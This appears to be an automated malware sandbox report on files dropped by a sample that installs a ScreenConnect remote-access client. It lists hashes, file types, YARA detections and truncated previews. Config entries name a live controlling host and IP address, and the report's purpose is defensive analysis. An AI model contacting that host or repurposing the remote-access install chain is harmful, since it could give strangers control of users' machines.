                                        SHA-512:A078EC2AA08F1928B7CEF2B3B17E02E5A52860DD684AD798AB8ACA0A55D1069F45E27497FABF15C4E932299FE206ED4E49085848A1BC3AE087B13ECE36F768E2
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 26%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.......T...@..................................)..P....`..t0S..........bT.p{....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...t0S..`...2S.. ..............@..@.reloc........T......RT.............@..B................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):5627248
                                        Entropy (8bit):7.427623078135939
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:70D47FA2E078F04400D3D1B236245678
                                        SHA1:987AA3368265FC300B10B4128D8367C3D7A29C6C
                                        SHA-256:B0A8D541B650FFFF1BB4B3690AF389E52B1675212129560DBE33038B1041266B
                                        SHA-512:A078EC2AA08F1928B7CEF2B3B17E02E5A52860DD684AD798AB8ACA0A55D1069F45E27497FABF15C4E932299FE206ED4E49085848A1BC3AE087B13ECE36F768E2
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 367452.crdownload, Author: Joe Security
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 367452.crdownload, Author: Joe Security
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 367452.crdownload, Author: Joe Security
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.......T...@..................................)..P....`..t0S..........bT.p{....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...t0S..`...2S.. ..............@..@.reloc........T......RT.............@..B................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):16833
                                        Entropy (8bit):6.471275006794133
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:86A0DB1A30A14B7469766B476B3899AA
                                        SHA1:AF7E095E376664D814DB0121CDA4E16D37D7DCD1
                                        SHA-256:8AF9E64282C84201C53B717105975C0680150A350B9A278C08B263BF88C86304
                                        SHA-512:001159C6E941D5AAE68B55CB35A050D7FC98AD37A3E4219DE701EBDBC8BD628DBB1B79F8B980454084558949FC1B86100CBDECE486A66BCD374A58E16BCB48C7
                                        Malicious:true
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.......T...@..................................)..P....`..t0S..........bT.p{....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...t0S..`...2S.. ..............@..@.reloc........T......RT.............@..B................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                        Category:dropped
                                        Size (bytes):13369344
                                        Entropy (8bit):7.966971359391998
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:DBA166C47F82656C2399F7223DE2DB3F
                                        SHA1:9CF89A17AEF41E2C3BDE3761E1769B2831609FDF
                                        SHA-256:20E07D53E0F53958D613CB374F001EBDBFF95ED2D96F2F46BCA286D408662B44
                                        SHA-512:B19E49CE816783F04AADF28AB02E0692383C5A5A706AB9C6E7A7329023F5596915FC26B88B1C72C4D68E934F0DA61DF99DCFE0CCE166F62544E6D5245939215C
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:......................>.......................................................{...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):423885
                                        Entropy (8bit):6.577024425752241
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8658789343259DADECC392441A6DD845
                                        SHA1:22F6DC5C662C0233033B888B7371E31974DEED14
                                        SHA-256:8C7538093E779EE10DC0F8A68448C4927EC834706D6810C50022B522C775FD68
                                        SHA-512:26E560AF9E5161F9038BED1BA1B46C5AF5D8DC9A0F3CF9BE6B7AC2CDE2C698B3BF772EEF374A48F34714EC123336266BB8465ADA8478CA76B68F6AD559D3E7EA
                                        Malicious:false
                                        Yara Hits:
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI71A0.tmp, Author: Joe Security
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI71A0.tmp, Author: Joe Security
                                        Reputation:unknown
                                        Preview:...@IXOS.@.....@#@&Z.@.....@.....@.....@.....@.....@......&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}'.ScreenConnect Client (484f9eed1d8e13b9)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (484f9eed1d8e13b9)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{E29000A5-D988-BF34-ACFB-64A448AB1544}^.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{5D9AA345-F8BD-8991-FE6D-9CD87DEF2A88}f.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{12B3F4C9-0930-DE85-D0AC-49BFF78FE3DC}c.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileMa
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):207360
                                        Entropy (8bit):6.573348437503042
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                        SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                        SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                        SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):20480
                                        Entropy (8bit):1.1725223063130226
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:3808275A1E28907AE85F14032F7F639F
                                        SHA1:FECF79BA42A0056A93D3202911D0050DA4B1AB93
                                        SHA-256:FE19A004EA2BA8982EF0F3790A24D3AC83505DE4008F261033440F42D65706B8
                                        SHA-512:1676554C6CB10C5A05536F932C24ADA1CCB5B9B27B67A4F94D2AF1880C8B8C6B545FD1B4B9940268DCCC913B8280DEA1993C91226189E6C31C51303606883674
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                        Category:dropped
                                        Size (bytes):435
                                        Entropy (8bit):5.289734780210945
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                        SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                        SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                        SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):403156
                                        Entropy (8bit):5.359651613810911
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6CD2BF029A997FF7116740ABEB1D0779
                                        SHA1:AB00FF18C33CD7726BE4C059264B67D9B18D1104
                                        SHA-256:1E9CC36007FE29D1E5A9D18D36896BB84C8848AEDF1A338C136CDABD1BDAA496
                                        SHA-512:F2F4575AE9D9938E79CADC9E27CBD44672CDB97476E0DA2855A4E859669E4EC6C06387DEAB26E3AF0A8C7AD7D7901A36C5556213FE349B9C2FF9B08DEF9CAA8A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):55
                                        Entropy (8bit):4.306461250274409
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                        Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):566
                                        Entropy (8bit):5.031347629773026
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:473D3E234E7C6F09E3BE855BDA1889A4
                                        SHA1:2022804EB73DC10FB582E18E80FF862AE1B10BEA
                                        SHA-256:F579D855D38EF0E97D550FAC7758ABF09487C877CE60F98E49392BD3E3B6D31C
                                        SHA-512:1A1A499DA7B1954B5855F74C855F16A1428F62E599B27169F317E0E8C5F79766FAF2E309825D60517507A056EE720B1F93975748D28480B5861DCC5BF1D87365
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2013%3a01%3a12</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                        Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):566
                                        Entropy (8bit):5.035566031827628
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:A91413F25F59C51C626CE626AA9D0369
                                        SHA1:267A9A10E45B63973EABD701197BF0ED694F5456
                                        SHA-256:9F2FE034B39528B1C0BD5D337619855294C8B3E0513F8C8C77DB6EECA738846E
                                        SHA-512:B248739A6DB327103BBA8E193AAAB7744A23FAA005238CDAE7E9B241909CB591090AD583B85C9100A68D61BF5514DB21E39D34E77FED0A251E3FC4878C697D73
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2013%3a01%3a46</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                        Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):0
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D1036EDEE4160E7A3A03B089C769C80F
                                        SHA1:2A6DA7D33B6B4D904D28FD96872F3BD555B52476
                                        SHA-256:51D02D5628736FC10B33718FA13742F1AE9CA47DB7BB8FDDED234893F675E9C8
                                        SHA-512:C5EC58CEBA3B1A00CABCB628060F9DF666DC5704CBF742B8852CDDCA752AF000A82715B2DEBF6BD03056B14497ED4232E998035AA80558C462A6B55F4E05A2B2
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2013%3a01%3a07</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                        Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):566
                                        Entropy (8bit):5.033624107158675
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:3C06836D85B844270AE3CE964CD34412
                                        SHA1:62A9693F32C82B53C3D0BF05632077BA182A34D7
                                        SHA-256:73C360C5AC81885F6458CCB5E8AAA4243E21C63C0BE9F20D4C1B7C5DF84506D3
                                        SHA-512:6EC136BBBA7DA078448A64F4211E546EC50F03B7AEB09F20F6BA30A17C6A3A9237F1FDF4118D3F42D859A143CAD3F308FCCD9BD87538628373C1C0642018AF4E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2013%3a01%3a09</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                        Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):566
                                        Entropy (8bit):5.0327579852581925
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D1036EDEE4160E7A3A03B089C769C80F
                                        SHA1:2A6DA7D33B6B4D904D28FD96872F3BD555B52476
                                        SHA-256:51D02D5628736FC10B33718FA13742F1AE9CA47DB7BB8FDDED234893F675E9C8
                                        SHA-512:C5EC58CEBA3B1A00CABCB628060F9DF666DC5704CBF742B8852CDDCA752AF000A82715B2DEBF6BD03056B14497ED4232E998035AA80558C462A6B55F4E05A2B2
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2013%3a01%3a07</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                        Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):566
                                        Entropy (8bit):5.033764706723999
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:EAA092FFD2CEBA9E438D95FB2A0D3921
                                        SHA1:72C59DA2907694BAC0B1106AE18FEB7CB0738CD7
                                        SHA-256:36A540DAC1C3FFAB4F2CB8241C58388D14ECC5B7F184E9076448EFEE30A7AC6E
                                        SHA-512:5D318B6F8F9B2DC0B2D247233C2A2BEE2BB917003533CDF1CB8523ED2C563EE5CBE3B47F1FB3D66FCC150A5F973EF09E2101589D96D5C8701F8FB249CC8B1F3F
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2013%3a01%3a53</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):32768
                                        Entropy (8bit):1.422399483829881
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E2F714B0A1FB0BE144DABE5187A5682D
                                        SHA1:FB9DA4DDD676E51335F2A88E47969AA83122CAB9
                                        SHA-256:74F7E08968DAB64F9D76BE75872646DB71E866E0DEAE482B9312D2CB6D3EAFB7
                                        SHA-512:093A6F951CD3DE6815ED747CA6139A6FECFB44C62EADD2F95E44EF1ED22DFDEA1DAF86CB54303FCC4734177802C8F4D55DF226C76AAE8629E15A57BA565C164F
                                        Malicious:false
                                        Yara Hits:
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF32625EBD992E86ED.TMP, Author: Joe Security
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF32625EBD992E86ED.TMP, Author: Joe Security
                                        Reputation:unknown
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):20480
                                        Entropy (8bit):1.8033915549319497
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:F85DD6A693FFAFA71DFD4B601BA143C0
                                        SHA1:1769923C3D8241FEDABBD8D7920DC2151CCEBEF9
                                        SHA-256:B6EB2D58C50EF10168A2FACD6A9B9DDACD711DD029BD829EB1A18B36FFD5667C
                                        SHA-512:EC78CA3F67B53B5184584D4E3CA81FC160D788502D27AB1B8FC7A95976F7D0A744355AA064448EBFB4644AC53C0233AB1BFB975B8F0861368561000EB2CF0CC6
                                        Malicious:false
                                        Yara Hits:
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF9CBAF1865D94B65A.TMP, Author: Joe Security
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF9CBAF1865D94B65A.TMP, Author: Joe Security
                                        Reputation:unknown
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):32768
                                        Entropy (8bit):0.07795815855168775
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:79654B3D5A84C6D9BF1AACB08299C584
                                        SHA1:17D38B9217295DCEF248D7B1C14CC74D19C8878B
                                        SHA-256:3C81D4C3FC24E12DCD46EF027F965167EB1D701B30AFA0BD581CC65DB83C1D07
                                        SHA-512:83B60D97FAA3D809C0297EE92EAA01D65A7F475EC1140AF881811C6FB2190FAB861BC66E145C1879771AFAF2DF9071F8F7ECF9C4AC2039B6E00571E5593D5635
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):69632
                                        Entropy (8bit):0.23547614089930022
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9D6B54321E79686F0E3E0AD06C448AEF
                                        SHA1:51B1159DA4C263771DCFF1EEB6D3ACE83731A0DE
                                        SHA-256:5825AAE5EA7811E17F9BB968EA263543F31110BE41074317879906FAF7EBD937
                                        SHA-512:E1238C4E8413EC04E84CAFE030F22386AD2DFEE38C1E58F9B7D5786474A602FAC85D40E58E6B3FA00F8D8C476F510546BF518A581EC59992A563D80C165F6466
                                        Malicious:false
                                        Yara Hits:
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFB71A7B35B829F0DC.TMP, Author: Joe Security
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFB71A7B35B829F0DC.TMP, Author: Joe Security
                                        Reputation:unknown
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        No static file info